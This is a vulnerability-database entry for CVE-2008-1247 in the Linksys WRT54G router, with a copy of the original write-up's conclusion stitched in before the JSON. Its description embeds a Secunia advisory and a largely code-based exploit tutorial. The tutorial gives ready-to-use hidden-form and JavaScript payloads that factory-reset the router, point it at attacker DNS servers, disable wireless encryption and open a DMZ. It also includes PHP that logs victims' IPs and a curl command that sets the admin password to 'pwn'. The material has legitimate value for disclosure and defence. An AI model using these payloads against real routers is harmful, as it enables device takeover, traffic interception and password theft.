Here the hacker can now log in as admin with password 'pwn' with complete freedom to REMOTELY monitor the mark's internal and outgoing network traffic. This can allow for capturing passwords via DNS poisoning on the router, and for man-in-the-middle attacks by pointing the local address of the router to a rogue DHCP server and, accordingly, to a rogue network of the attacker's, plus more.
++| Conclusion
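It is my intention in finalizing this document that the reader understands that the Linksys WRT54G firmware version 1.00.9 does not care if you are inside or outside its local network. Nor does it care whether or not you have the level of privilege thought to be necessary for manipulating sensitive objects. The Secunia advisory SA29344 quoted in this record lists the fixed firmware to install: 1.02.5 for WRT54G v5/v6, 8.00.5 for v8, and 8.2.05 for v8.2.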
Thanks go to hw2B for suggesting I write all of this garbage out.
++| URLs
https://kinqpinz.info/lib/wrt54g/ (demonstration page with embedded HTML forms found in this document) https://kinqpinz.info/lib/wrt54g/own.txt (initial findings from February 2008) https://kinqpinz.info/lib/wrt54g/own2.txt (this document) http://nvd.nist.gov/nvd.cfm?cvename=CVE-2008-1247 (CVE-2008-1247)
{
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/VARIoTentry#",
"affected_products": {
"@id": "https://www.variotdbs.pl/ref/affected_products"
},
"configurations": {
"@id": "https://www.variotdbs.pl/ref/configurations"
},
"credits": {
"@id": "https://www.variotdbs.pl/ref/credits"
},
"cvss": {
"@id": "https://www.variotdbs.pl/ref/cvss/"
},
"description": {
"@id": "https://www.variotdbs.pl/ref/description/"
},
"exploit_availability": {
"@id": "https://www.variotdbs.pl/ref/exploit_availability/"
},
"external_ids": {
"@id": "https://www.variotdbs.pl/ref/external_ids/"
},
"iot": {
"@id": "https://www.variotdbs.pl/ref/iot/"
},
"iot_taxonomy": {
"@id": "https://www.variotdbs.pl/ref/iot_taxonomy/"
},
"patch": {
"@id": "https://www.variotdbs.pl/ref/patch/"
},
"problemtype_data": {
"@id": "https://www.variotdbs.pl/ref/problemtype_data/"
},
"references": {
"@id": "https://www.variotdbs.pl/ref/references/"
},
"sources": {
"@id": "https://www.variotdbs.pl/ref/sources/"
},
"sources_release_date": {
"@id": "https://www.variotdbs.pl/ref/sources_release_date/"
},
"sources_update_date": {
"@id": "https://www.variotdbs.pl/ref/sources_update_date/"
},
"threat_type": {
"@id": "https://www.variotdbs.pl/ref/threat_type/"
},
"title": {
"@id": "https://www.variotdbs.pl/ref/title/"
},
"type": {
"@id": "https://www.variotdbs.pl/ref/type/"
}
},
"@id": "https://www.variotdbs.pl/vuln/VAR-200803-0170",
"affected_products": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/affected_products#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"model": "wrt54g",
"scope": "eq",
"trust": 1.0,
"vendor": "linksys",
"version": "*"
},
{
"model": "wrt54g",
"scope": "eq",
"trust": 0.8,
"vendor": "cisco linksys",
"version": "1.00.9"
},
{
"model": "wrt54g",
"scope": "eq",
"trust": 0.6,
"vendor": "linksys",
"version": "1.00.9"
},
{
"model": "wrt54g",
"scope": "eq",
"trust": 0.3,
"vendor": "linksys",
"version": "v1.01.0.9"
}
],
"sources": [
{
"db": "BID",
"id": "28381"
},
{
"db": "JVNDB",
"id": "JVNDB-2008-004203"
},
{
"db": "NVD",
"id": "CVE-2008-1247"
},
{
"db": "CNNVD",
"id": "CNNVD-200803-125"
}
]
},
"configurations": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/configurations#",
"children": {
"@container": "@list"
},
"cpe_match": {
"@container": "@list"
},
"data": {
"@container": "@list"
},
"nodes": {
"@container": "@list"
}
},
"data": [
{
"CVE_data_version": "4.0",
"nodes": [
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:h:linksys:wrt54g:*:*:1.00.9:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
}
],
"operator": "OR"
}
]
}
],
"sources": [
{
"db": "NVD",
"id": "CVE-2008-1247"
}
]
},
"credits": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/credits#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "meathive",
"sources": [
{
"db": "PACKETSTORM",
"id": "64904"
},
{
"db": "PACKETSTORM",
"id": "67644"
},
{
"db": "CNNVD",
"id": "CNNVD-200803-125"
}
],
"trust": 0.8
},
"cve": "CVE-2008-1247",
"cvss": {
"@context": {
"cvssV2": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV2#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV2"
},
"cvssV3": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV3#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV3/"
},
"severity": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/cvss/severity#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/severity"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"cvssV2": [
{
"acInsufInfo": false,
"accessComplexity": "LOW",
"accessVector": "NETWORK",
"authentication": "NONE",
"author": "NVD",
"availabilityImpact": "COMPLETE",
"baseScore": 10.0,
"confidentialityImpact": "COMPLETE",
"exploitabilityScore": 10.0,
"impactScore": 10.0,
"integrityImpact": "COMPLETE",
"obtainAllPrivilege": true,
"obtainOtherPrivilege": false,
"obtainUserPrivilege": false,
"severity": "HIGH",
"trust": 1.0,
"userInteractionRequired": false,
"vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C",
"version": "2.0"
},
{
"acInsufInfo": null,
"accessComplexity": "Low",
"accessVector": "Network",
"authentication": "None",
"author": "NVD",
"availabilityImpact": "Complete",
"baseScore": 10.0,
"confidentialityImpact": "Complete",
"exploitabilityScore": null,
"id": "CVE-2008-1247",
"impactScore": null,
"integrityImpact": "Complete",
"obtainAllPrivilege": null,
"obtainOtherPrivilege": null,
"obtainUserPrivilege": null,
"severity": "High",
"trust": 0.8,
"userInteractionRequired": null,
"vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C",
"version": "2.0"
},
{
"accessComplexity": "LOW",
"accessVector": "NETWORK",
"authentication": "NONE",
"author": "VULHUB",
"availabilityImpact": "COMPLETE",
"baseScore": 10.0,
"confidentialityImpact": "COMPLETE",
"exploitabilityScore": 10.0,
"id": "VHN-31372",
"impactScore": 10.0,
"integrityImpact": "COMPLETE",
"severity": "HIGH",
"trust": 0.1,
"vectorString": "AV:N/AC:L/AU:N/C:C/I:C/A:C",
"version": "2.0"
}
],
"cvssV3": [],
"severity": [
{
"author": "NVD",
"id": "CVE-2008-1247",
"trust": 1.8,
"value": "HIGH"
},
{
"author": "CNNVD",
"id": "CNNVD-200803-125",
"trust": 0.6,
"value": "CRITICAL"
},
{
"author": "VULHUB",
"id": "VHN-31372",
"trust": 0.1,
"value": "HIGH"
}
]
}
],
"sources": [
{
"db": "VULHUB",
"id": "VHN-31372"
},
{
"db": "JVNDB",
"id": "JVNDB-2008-004203"
},
{
"db": "NVD",
"id": "CVE-2008-1247"
},
{
"db": "CNNVD",
"id": "CNNVD-200803-125"
}
]
},
"description": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/description#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "The web interface on the Linksys WRT54g router with firmware 1.00.9 does not require credentials when invoking scripts, which allows remote attackers to perform arbitrary administrative actions via a direct request to (1) Advanced.tri, (2) AdvRoute.tri, (3) Basic.tri, (4) ctlog.tri, (5) ddns.tri, (6) dmz.tri, (7) factdefa.tri, (8) filter.tri, (9) fw.tri, (10) manage.tri, (11) ping.tri, (12) PortRange.tri, (13) ptrigger.tri, (14) qos.tri, (15) rstatus.tri, (16) tracert.tri, (17) vpn.tri, (18) WanMac.tri, (19) WBasic.tri, or (20) WFilter.tri. NOTE: the Security.tri vector is already covered by CVE-2006-5202. The problem is CVE-2006-5202 And may overlap.A third party may perform any administrator action through the following direct requests: (1) Advanced.tri (2) AdvRoute.tri (3) Basic.tri (4) ctlog.tri (5) ddns.tri (6) dmz.tri (7) factdefa.tri (8) filter.tri (9) fw.tri (10) manage.tri (11) ping.tri (12) PortRange.tri (13) ptrigger.tri (14) qos.tri (15) rstatus.tri (16) tracert.tri (17) vpn.tri (18) WanMac.tri (19) WBasic.tri (20) WFilter.tri. Linksys WRT54G Wireless-G Router is prone to multiple authentication-bypass vulnerabilities. \nSuccessful exploits will allow unauthorized attackers to gain access to administrative functionality and completely compromise vulnerable devices; other attacks are also possible. \nThe issues affect firmware v1.00.9; other versions may also be vulnerable. ----------------------------------------------------------------------\n\nA new version (0.9.0.0 - Release Candidate 1) of the free Secunia PSI\nhas been released. The new version includes many new and advanced\nfeatures, which makes it even easier to stay patched. 
\n\nDownload and test it today:\nhttps://psi.secunia.com/\n\nRead more about this new version:\nhttps://psi.secunia.com/?page=changelog\n\n----------------------------------------------------------------------\n\nTITLE:\nLinksys WRT54G Security Bypass Vulnerability\n\nSECUNIA ADVISORY ID:\nSA29344\n\nVERIFY ADVISORY:\nhttp://secunia.com/advisories/29344/\n\nCRITICAL:\nLess critical\n\nIMPACT:\nSecurity Bypass\n\nWHERE:\n\u003eFrom local network\n\nOPERATING SYSTEM:\nLinksys WRT54G Wireless-G Broadband Router\nhttp://secunia.com/product/3523/\n\nDESCRIPTION:\nmeathive has reported a vulnerability in Linksys WRT54G, which can be\nexploited by malicious people to bypass certain security\nrestrictions. \n\nThe vulnerability is caused due to improper authorization checks when\nperforming administrative actions via the web interface. This can be\nexploited to perform restricted actions by directly accessing \nBasic.tri, factdefa.tri, manage.tri, WBasic.tri, WFilter.tri,\ndmz.tri, ddns.tri, WanMac.tri, AdvRoute.tri, Advanced.tri, fw.tri,\nvpn.tri, filter.tri, PortRange.tri, ptrigger.tri, qos.tri, ctlog.tri,\nping.tri, tracert.tri, or rstatus.tri. \n\nWRT54G v5/v6:\nInstall version 1.02.5. \n\nWRT54G v8:\nInstall version 8.00.5. \n\nWRT54G v8.2:\nInstall version 8.2.05. \n\nPROVIDED AND/OR DISCOVERED BY:\nmeathive\n\nORIGINAL ADVISORY:\nhttp://kinqpinz.info/lib/wrt54g/own.txt\n\n----------------------------------------------------------------------\n\nAbout:\nThis Advisory was delivered by Secunia as a free service to help\neverybody keeping their systems up to date against the latest\nvulnerabilities. \n\nSubscribe:\nhttp://secunia.com/secunia_security_advisories/\n\nDefinitions: (Criticality, Where etc.)\nhttp://secunia.com/about_secunia_advisories/\n\n\nPlease Note:\nSecunia recommends that you verify all advisories you receive by\nclicking the link. \nSecunia NEVER sends attached files with advisories. 
\nSecunia does not advise people to install third party patches, only\nuse those supplied by the vendor. \n\n----------------------------------------------------------------------\n\nUnsubscribe: Secunia Security Advisories\nhttp://secunia.com/sec_adv_unsubscribe/?email=packet%40packetstormsecurity.org\n\n----------------------------------------------------------------------\n\n\n. \t __ _ ____ ____ ___ ____ ____ ____ _____ ____ ____ _____ ___\n\t| l/ ]l j| \\ / \\ | \\l j| \\ | T l j| \\ | | / \\\n\t| \u0027 / | T | _ YY Y| o )| T | _ Yl__/ | | T | _ Y| __jY Y\n\t| \\ | | | | || Q || _/ | | | | || __j | | | | || l_ | O |\n\t| Y | | | | || || | | | | | || / | __ | | | | || _] | |\n\t| . \n\n++| Intro\n----------------------\nThis text is in addition to the findings I have already made public regarding the Linksys WRT54G \nwireless router and firewall gateway device. The scripts that process configuration changes do not \nrequire authentication and therefore can be altered _remotely_ via simple form submissions written \nin HTML and submitted using JavaScript. Please refer to the bottom of this text for my previous \nfindings and the demo page with sample exploits. \n\n++| Let\u0027s Get Dirty\n----------------------\nYou may find my original demonstration page at https://kinqpinz.info/lib/wrt54g/. It basically shows\nhow forms can be constructed in HTML that take advantage of the major flaws present within the \ninsecure router. In my previous documentation I showed how it is possible to alter configuration \nparameters both via Linux command line using curl and HTML form submissions. In this text I \ndemonstrate how to do these very same things transparently using a combination of HTML form \nconstruction with JavaScript that automagically submits our desired changes. \n\nThe JavaScript is simple and is only used for submitting the form - a user-free mechanism that will \nredirect the user to their router and prompts them to log in. 
Once again, THE REQUEST TO \nAUTHENTICATE TO THE DEVICE IS NOT REQUIRED IN ORDER TO CHANGE ITS SETTINGS. The following is all \nthat is required in order to submit our form that will be constructed using GET parameters observed \nfrom the device\u0027s Web interface. \n\ndocument.f.submit();\n\nThis submits forms hidden within the Webpage. Our first example code enables wireless access with an\nSSID of our choosing. In this instance, I will use the SSID \"kinqpinz\". \n\n\u003cform name=\"f\" action=\"http://192.168.1.1/WBasic.tri\" method=\"POST\"\u003e\n \u003cinput type=\"hidden\" name=\"submit_type\" value=\"\"\u003e\n \u003cinput type=\"hidden\" name=\"channelno\" value=\"11\"\u003e\n \u003cinput type=\"hidden\" name=\"OldWirelessMode\" value=\"3\"\u003e\n \u003cinput type=\"hidden\" name=\"Mode\" value=\"3\"\u003e\n \u003cinput type=\"hidden\" name=\"SSID\" value=\"kinqpinz\"\u003e\n \u003cinput type=\"hidden\" name=\"channel\" value=\"6\"\u003e\n \u003cinput type=\"hidden\" name=\"Freq\" value=\"6\"\u003e\n \u003cinput type=\"hidden\" name=\"wl_closed\" value=\"1\"\u003e\n \u003cinput type=\"hidden\" name=\"sesMode\" value=\"1\"\u003e\n \u003cinput type=\"hidden\" name=\"layout\" value=\"en\"\u003e\n\u003c/form\u003e\n\nThe reason this works is simple: configuration parameters are constructed in the URL in the Web \ninterface, hosted by default at the address http://192.168.1.1. One can view these parameters while \nconfiguring their device. The code above simply constructs a URL that is processed by the router\u0027s \nIOS script WBasic.tri. The URL resembles the following if you were to view it within your browser:\n\nhttp://192.168.1.1/WBasic.tri?submit_type=\u0026channelno=11\u0026OldWirelessMode=3\u0026Mode=3\u0026SSID=kinqpinz\u0026channel=6\u0026Freq=6\u0026wl_closed=1\u0026sesMode=1\u0026layout=en\n\nIt\u0027s simple enough to understand what\u0027s going on. 
Each variable passed in the URL describes exactly \nwhat its purpose is - at least the important ones such as \"SSID\" and \"channel\". The only tricky part \nto exploiting the router is the fact that you cannot alter settings using a URL like the one above. \nThat would result in a GET request on behalf of the device, whereas we\u0027re interested in POST \nrequests that actually trigger configuration changes. A GET request does nothing. Below I describe \na real world attack scenario that makes use of knowledge about the device, embedded HTML + JavaScript, \nand a touch of PHP to grab the mark\u0027s external IP. \n\n++| Remote Real World Attack Scenario\n----------------------\nSo http://www.hacker.tld hosts an evil page that wants to compromise your Linksys WRT54G router. It \nhas made a few assumptions about your environment, however. One major assumption is that you\u0027ve \nkept your router\u0027s default local gateway address, namely 192.168.1.1. No matter what other changes \nyou\u0027ve made to the router in terms of security, e.g., strong password, wireless encryption, access \nrestrictions - they are useless. So this brings us to an important lesson concerning the WRT54G: do \nNOT retain the default local address of 192.168.1.1. It is pertinent that you change this address so \nthat you do not fall victim to a malicious individual hosting code that will be presented in this \ntext. 
\n\n++| Remote Real World Attack Scenario Requirements\n----------------------\nOn http://www.hacker.tld a page is hosted that contains the following:\n (1) hidden HTML forms that contain the values/params needed to configure the WRT54G remotely;\n (2) JavaScript that submits these forms transparently;\n (3) PHP or similar server-side code that acquires the mark\u0027s external IP address as they browse \n the page; and,\n (4) PHP or similar server-side code that retains the mark\u0027s external IP address in the event that \n the remote form submission is successful, thus allowing the remote attacker to further exploit the \n device. \n\nhttp://www.hacker.tld/index.php contains the following code for achieving its purpose. To begin, PHP \nis used - though any server-side language is suitable - for obtaining the external IP of any \nindividual viewing the exploit page and writes this information to a log file. \n\u003c?php\n $ip=$_SERVER[\u0027REMOTE_ADDR\u0027];\n $toWrite=\"Potential mark resides at $ip\\n\\n\";\n $f=fopen(\"mark.txt\", \"a+\");\n fwrite($f, $toWrite);\n fclose($f);\n?\u003e\n\nThe JavaScript is as simple as retrieving the form object identified by the \u0027name\u0027 HTML attribute \nand submitting the form. \n\n\u003cscript type=\"text/javascript\"\u003e\n document.f.submit();\n\u003c/script\u003e\n\nAll hacker.tld needs now is the forms used to store the URL params, conveniently hidden using the\nHTML form\u0027s \u0027hidden\u0027 attribute. 
\n\n\u003cform name=\"f\" action=\"http://192.168.1.1/WBasic.tri\" method=\"POST\"\u003e\n \u003cinput type=\"hidden\" name=\"submit_type\" value=\"\"\u003e\n \u003cinput type=\"hidden\" name=\"channelno\" value=\"11\"\u003e\n \u003cinput type=\"hidden\" name=\"OldWirelessMode\" value=\"3\"\u003e\n \u003cinput type=\"hidden\" name=\"Mode\" value=\"3\"\u003e\n \u003cinput type=\"hidden\" name=\"SSID\" value=\"kinqpinz\"\u003e\n \u003cinput type=\"hidden\" name=\"channel\" value=\"6\"\u003e\n \u003cinput type=\"hidden\" name=\"Freq\" value=\"6\"\u003e\n \u003cinput type=\"hidden\" name=\"wl_closed\" value=\"1\"\u003e\n \u003cinput type=\"hidden\" name=\"sesMode\" value=\"1\"\u003e\n \u003cinput type=\"hidden\" name=\"layout\" value=\"en\"\u003e\n\u003c/form\u003e\n\nWhat you should observe from this is the form name of \"f\" which is used in the JS to submit the form \nas well as the various \u0027name\u0027 and \u0027value\u0027 attributes that are used to create a URL such as this:\n\nsubmit_type=\u0026channelno=11\u0026OldWirelessMode=3\u0026Mode=3\u0026SSID=kinqpinz\u0026channel=6\u0026Freq=6\u0026wl_closed=1\u0026sesMode=1\u0026layout=en\n\nDo note that without any one of these parameters, the exploit fails and nothing changes. All of the \nelements must remain in place even if they do not directly make sense. They are simply options that \nthe processing script, in this case WBasic.tri, requires prior to fulfilling the request. Case \nmatters and do not forget that the request must be POST, not GET. Also different config changes \nrequire different scripts, so WBasic.tri is not used for, say, enabling/disabling the firewall log. \n\nNow that the malicious page has been composed and sits online living and waiting for marks at \nhttp://www.hacker.tld/index.php, as each request is made to the page it is logged using our custom \nPHP logging script. In mark.txt, our logging file, sample output would resemble something like the \nfollowing. 
\n\nPotential mark resides at 1.1.1.1\n\nPotential mark resides at 2.2.2.2\n\nPotential mark resides at 3.3.3.3\n\nSo forth... \n\nThey are potential marks because it is unknown whether or not they are using the WRT54G with a \nsupported firmware version that is exploitable using these techniques, and/or the exploit attempt \nfailed, perhaps because our mark cancelled the request before it could be fulfilled, or they are not \nusing the default local address (good for them) that this attack relies on. \n\nWhen they browse the page, because we have set no timeout for this change to occur, they are \ninstantly redirected to http://192.168.1.1/WBasic.tri. The URL, because it is not a GET request, \ndoes not inform the user if they were educated enough of what has just happened, so they may \ncontinue on doing whatever they were doing, more often than not unaware of what has just happened. \nAt the same time our PHP script has logged this access attempt to mark.txt which we can retrieve at \nour leisure and further test the remote host whether or not they are vulnerable to attack. At the \nvery least, we may decide to completely reset the router to rest assured we know its current state \nto make further compromise a snap, such as altering the device\u0027s DNS records for sniffing traffic. \nThis is quite feasible, here\u0027s how. \n\n\u003cform method=\"post\" action=\"http://192.168.1.1/factdefa.tri\"\u003e\n \u003cinput type=\"hidden\" name=\"FactoryDefaults\" value=\"Yes\"\u003e\n \u003cinput type=\"hidden\" name=\"layout\" value=\"en\"\u003e\n \u003cinput type=\"submit\"\u003e\n\u003c/form\u003e\n\nThis gives us the following URL: http://192.168.1.1/factdefa.tri?FactoryDefaults=Yes\u0026layout=en\n\nNow we can change the DNS again at our leisure, perhaps to our own DNS server that intercepts/logs \nall incoming and outgoing requests before passing them on to the next in line. 
\n\n\u003cform method=\"post\" action=\"http://192.168.1.1/Basic.tri\"\u003e\n \u003cinput type=\"hidden\" name=\"dhcp_end\" value=\"149\"\u003e\n \u003cinput type=\"hidden\" name=\"oldMtu\" value=\"1500\"\u003e\n \u003cinput type=\"hidden\" name=\"oldLanSubnet\" value=\"0\"\u003e\n \u003cinput type=\"hidden\" name=\"OldWanMode\" value=\"0\"\u003e\n \u003cinput type=\"hidden\" name=\"SDHCP1\" value=\"192\"\u003e\n \u003cinput type=\"hidden\" name=\"SDHCP2\" value=\"168\"\u003e\n \u003cinput type=\"hidden\" name=\"SDHCP3\" value=\"1\"\u003e\n \u003cinput type=\"hidden\" name=\"SDHCP4\" value=\"100\"\u003e\n \u003cinput type=\"hidden\" name=\"EDHCP1\" value=\"192\"\u003e\n \u003cinput type=\"hidden\" name=\"EDHCP2\" value=\"168\"\u003e\n \u003cinput type=\"hidden\" name=\"EDHCP3\" value=\"1\"\u003e\n \u003cinput type=\"hidden\" name=\"EDHCP4\" value=\"150\"\u003e\n \u003cinput type=\"hidden\" name=\"pd\" value=\"\"\u003e\n \u003cinput type=\"hidden\" name=\"now_proto\" value=\"dhcp\"\u003e\n \u003cinput type=\"hidden\" name=\"old_domain\" value=\"\"\u003e\n \u003cinput type=\"hidden\" name=\"chg_lanip\" value=\"192.168.1.1\"\u003e\n \u003cinput type=\"hidden\" name=\"_daylight_time\" value=\"1\"\u003e\n \u003cinput type=\"hidden\" name=\"wan_proto\" value=\"0\"\u003e\n \u003cinput type=\"hidden\" name=\"router_name\" value=\"WRT54G\"\u003e\n \u003cinput type=\"hidden\" name=\"wan_hostname\" value=\"\"\u003e\n \u003cinput type=\"hidden\" name=\"wan_domain\" value=\"\"\u003e\n \u003cinput type=\"hidden\" name=\"mtu_enable\" value=\"0\"\u003e\n \u003cinput type=\"hidden\" name=\"lan_ipaddr_0\" value=\"192\"\u003e\n \u003cinput type=\"hidden\" name=\"lan_ipaddr_1\" value=\"168\"\u003e\n \u003cinput type=\"hidden\" name=\"lan_ipaddr_2\" value=\"1\"\u003e\n \u003cinput type=\"hidden\" name=\"lan_ipaddr_3\" value=\"1\"\u003e\n \u003cinput type=\"hidden\" name=\"lan_netmask\" value=\"0\"\u003e\n \u003cinput type=\"hidden\" name=\"lan_proto\" value=\"Enable\"\u003e\n 
\u003cinput type=\"hidden\" name=\"dhcp_start\" value=\"100\"\u003e\n \u003cinput type=\"hidden\" name=\"dhcp_num\" value=\"50\"\u003e\n \u003cinput type=\"hidden\" name=\"dhcp_lease\" value=\"0\"\u003e\n \u003cinput type=\"hidden\" name=\"dns0_0\" value=\"1\"\u003e\n \u003cinput type=\"hidden\" name=\"dns0_1\" value=\"2\"\u003e\n \u003cinput type=\"hidden\" name=\"dns0_2\" value=\"3\"\u003e\n \u003cinput type=\"hidden\" name=\"dns0_3\" value=\"4\"\u003e\n \u003cinput type=\"hidden\" name=\"dns1_0\" value=\"5\"\u003e\n \u003cinput type=\"hidden\" name=\"dns1_1\" value=\"6\"\u003e\n \u003cinput type=\"hidden\" name=\"dns1_2\" value=\"7\"\u003e\n \u003cinput type=\"hidden\" name=\"dns1_3\" value=\"8\"\u003e\n \u003cinput type=\"hidden\" name=\"dns2_0\" value=\"9\"\u003e\n \u003cinput type=\"hidden\" name=\"dns2_1\" value=\"8\"\u003e\n \u003cinput type=\"hidden\" name=\"dns2_2\" value=\"7\"\u003e\n \u003cinput type=\"hidden\" name=\"dns2_3\" value=\"6\"\u003e\n \u003cinput type=\"hidden\" name=\"wins_0\" value=\"0\"\u003e\n \u003cinput type=\"hidden\" name=\"wins_1\" value=\"0\"\u003e\n \u003cinput type=\"hidden\" name=\"wins_2\" value=\"0\"\u003e\n \u003cinput type=\"hidden\" name=\"wins_3\" value=\"0\"\u003e\n \u003cinput type=\"hidden\" name=\"time_zone\" value=\"%28GMT-08%3A00%29+Pacific+Time+%28USA+%26+Canada%29\"\u003e\n \u003cinput type=\"hidden\" name=\"daylight_time\" value=\"ON\"\u003e\n \u003cinput type=\"hidden\" name=\"layout\" value=\"en\"\u003e\n \u003cinput type=\"submit\"\u003e\n\u003c/form\u003e\n\nThis is indeed convoluted but all of these values must be in place in order to be successful. What \nis it doing? It overrides whatever DNS settings were set either by our mark or by their ISP with our \nown custom values, in this instance DNS server #1 is set to 1.2.3.4, DNS server #2 is set to 5.6.7.8, \nand DNS server #3 is set to 9.8.7.6. Typically these values are populated by the router itself while \nobtaining its dynamic IP from the ISP. 
In case you\u0027re curious, these forms are used to construct the \nfollowing URL that is submitted to http://192.168.1.1/Basic.tri. \n\nhttp://192.168.1.1/Basic.tri?dhcp_end=149\u0026oldMtu=1500\u0026oldLanSubnet=0\u0026OldWanMode=0\u0026SDHCP1=192\u0026SDHCP2=168\u0026SDHCP3=1\u0026SDHCP4=100\u0026EDHCP1=192\u0026EDHCP2=168\u0026EDHCP3=1\u0026EDHCP4=150\u0026pd=\u0026now_proto=dhcp\u0026old_domain=\u0026chg_lanip=192.168.1.1\u0026_daylight_time=1\u0026wan_proto=0\u0026router_name=WRT54G\u0026wan_hostname=\u0026wan_domain=\u0026mtu_enable=0\u0026lan_ipaddr_0=192\u0026lan_ipaddr_1=168\u0026lan_ipaddr_2=1\u0026lan_ipaddr_3=1\u0026lan_netmask=0\u0026lan_proto=Enable\u0026dhcp_start=100\u0026dhcp_num=50\u0026dhcp_lease=0\u0026dns0_0=1\u0026dns0_1=2\u0026dns0_2=3\u0026dns0_3=4\u0026dns1_0=5\u0026dns1_1=6\u0026dns1_2=7\u0026dns1_3=8\u0026dns2_0=9\u0026dns2_1=8\u0026dns2_2=7\u0026dns2_3=6\u0026wins_0=0\u0026wins_1=0\u0026wins_2=0\u0026wins_3=0\u0026time_zone=%28GMT-08%3A00%29+Pacific+Time+%28USA+%26+Canada%29\u0026daylight_time=ON\u0026layout=en\n\n++| An Alternative (with JavaScript)\n----------------------\nThis is the basic exploitation method of the router although the attacker has many alternatives of \nsubmitting configuration changes assuming you allow client-side scripts to execute, namely JavaScript. 
\nA few alternative methods would include using a JavaScript onClick function within a standard \nlooking HTML anchor tag to submit the information with XMLHttpRequest, e.g.:\n\n\u003ca href=\"/path/\" onClick=\"xhrRequest();\"\u003eThis looks innocent enough.\u003c/a\u003e\n\n...where xhrRequest uses and submits preset configuration parameters upon our mark clicking on this \nstandard looking navigation link, e.g.:\n\nvar xhr=false;\nif(window.XMLHttpRequest) {\n xhr=new XMLHttpRequest();\n} else if(window.ActiveXObject) {\n xhr=new ActiveXObject(\"Microsoft.XMLHTTP\");\n}\nfunction xhrRequest() {\n if(xhr) {\n xhr.open(\"POST\", \"http://192.168.1.1/Security.tri\", true);\n xhr.setRequestHeader(\u0027Content-Type\u0027, \u0027application/x-www-form-urlencoded\u0027);\n xhr.onreadystatechange=function() {\n if(xhr.readyState == 4 \u0026\u0026 xhr.status == 200) {\n var success=xhr.responseText;\n }\n }\n xhr.send(\"SecurityMode=0\u0026layout=en\");\n }\n}\n\nThe example above effectively disables all wireless encryption so that if you happen to live close \nenough to this poor individual, it is your duty to pwn their wireless by enabling open access for \neverybody in the neighborhood! Here\u0027s the URL for disabling wireless encryption:\n\nhttp://192.168.1.1/Security.tri?SecurityMode=0\u0026layout=en\n\n++| An Alternative (without JavaScript)\n----------------------\nYou\u0027re still exploitable even if you do not allow scripts from executing, e.g., you use Firefox + \nNoScript. Our hackerific page hosted at http://www.hacker.tld/index.php can still use innocent \nlooking methods of compromising your WRT54G. For example, user registration for a bulletin board or \nforum system. The site must acquire a minimal amount of information in order to create the account \nso it is in submitting this data that we may submit our own payload, perhaps this time we\u0027d like to \nenable DMZ for complete access to any and all shares/services on our mark\u0027s computer. 
Here is the \nURL once again:\n\nhttp://192.168.1.1/dmz.tri?action=Apply\u0026dmz_enable=1\u0026dmz_ipaddr=100\u0026layout=en\n\nAgain it is a different script processing the request on behalf of the router\u0027s internal operating \nsystem, dmz.tri, but it still does not require authentication prior to changing the settings we wish \nto change. All hacker.tld must do is replace the HTML payload with what he/she wishes to alter, e.g.:\n\n\u003cform method=\"post\" action=\"http://192.168.1.1/dmz.tri\"\u003e\n \u003cinput type=\"hidden\" name=\"action\" value=\"Apply\"\u003e\n \u003cinput type=\"hidden\" name=\"dmz_enable\" value=\"1\"\u003e\n \u003cinput type=\"hidden\" name=\"dmz_ipaddr\" value=\"100\"\u003e\n \u003cinput type=\"hidden\" name=\"layout\" value=\"en\"\u003e\n\n...and add these values to their user registration page with standard username/password/e-mail fields... \n \n Username: \u003cinput type=\"text\" name=\"username\"\u003e\u003cbr\u003e\n Password: \u003cinput type=\"password\" name=\"password1\"\u003e\u003cbr\u003e\n Confirm Password: \u003cinput type=\"password\" name=\"password2\"\u003e\u003cbr\u003e\n \u003cinput type=\"submit\"\u003e\n\u003c/form\u003e\n\n...that can be found on traditional forums these days. The mark submits and exploits his/her own \nrouter although they believe they are at least minimally technically savvy by using a combination of \ntechnologies (Firefox, NoScript) to combat hackers and their methodologies. It works since the forms \nwe use to store the router configs are hidden, and the normal user registration forms are not, thus \nit is unknown the nature of what supplementary data hacker.tld has appended. Even if the mark has \ndetected that a potential attack is taking place it is likely too late as the mastermind behind \nhttp://www.hacker.tld/ is running a tail -f on his/her Web server logs to immediately snatch up \ntargets. 
Once a request is submitted, the hacker knows the Linksys WRT54G makes configuration \nchanges within 10 seconds, which is plenty of time for them to open another terminal and change the \nadministrative login to block our mark from changing their settings, e.g.:\n\ncurl -d \"remote_mgt_https=0\u0026http_enable=1\u0026https_enable=0\u0026PasswdModify=1\u0026http_passwd=pwn\u0026http_passwdConfirm=pwn\u0026_http_enable=1\u0026web_wl_filter=1\u0026remote_management=0\u0026upnp_enable=1\u0026layout=en\" http://\u003cREMOTE_EXTERNAL_ADDR\u003e/manage.tri\n\nHere the hacker can now log in as admin with password \u0027pwn\u0027 with complete freedom to _REMOTELY_ \nmonitor the mark\u0027s internal and outgoing network traffic. This can allow for capturing passwords \nvia DNS poisoning on the router, man-in-the-middle attacks by pointing the local address of the \nrouter to a rogue DHCP server and accordingly, rogue network of the attacker\u0027s, plus more. \n\n++| Conclusion\n----------------------\nIt is my intention in finalizing this document that the reader understands that 